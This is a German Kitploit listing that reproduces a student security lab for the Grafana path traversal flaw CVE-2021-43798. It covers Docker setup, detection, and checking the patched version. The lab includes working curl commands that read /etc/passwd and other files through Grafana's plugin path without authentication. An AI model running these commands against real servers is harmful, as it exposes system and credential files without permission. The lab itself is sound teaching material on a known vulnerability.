Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana Unauthenticated Path Traversal - Security Lab | Shivam Gupta | 23104003 | Kitploit
Tools/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Unauthenticated Path Traversal - Security Lab | Shivam Gupta | 23104003

Repository anzeigen
vor 6h 51mNoch nicht geprüft

CVE-2021-43798 — Grafana-Labor für nicht authentifizierten Path Traversal

Nur für Bildungszwecke. Führen Sie dieses Labor nur auf einer isolierten lokalen Maschine aus. Setzen Sie es niemals dem Internet aus.


CVE-Zusammenfassung

FeldDetail
CVE-IDCVE-2021-43798
ProduktGrafana
Betroffene Versionen8.0.0 – 8.3.0
Gepatchte Version8.3.1+
SchweregradHoch
CVSS v3.1 Score7.5
CWECWE-22 — Path Traversal
Authentifizierung erforderlichKeine
AngriffsvektorNetzwerk

Voraussetzungen

  • Docker Desktop (laufend)
  • Git
  • curl

Einrichtung

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Verwundbare Umgebung starten

root@kitploit:~
docker compose up -d

Überprüfen:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

Öffnen Sie http://127.0.0.1:3000 — Login: admin / admin


Die Schwachstelle ausnutzen

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Erwartet: Dateiinhalte werden mit HTTP 200 zurückgegeben — keine Authentifizierung erforderlich.


Erkennung

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Wenn der Hostname zurückgegeben wird → VERWUNDBAR. Version 8.0.0–8.3.0 → VERWUNDBAR.


Behebung

Gepatchte Instanz starten (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Überprüfen, ob der Exploit blockiert wird:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

Labor stoppen

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Tool herunterladen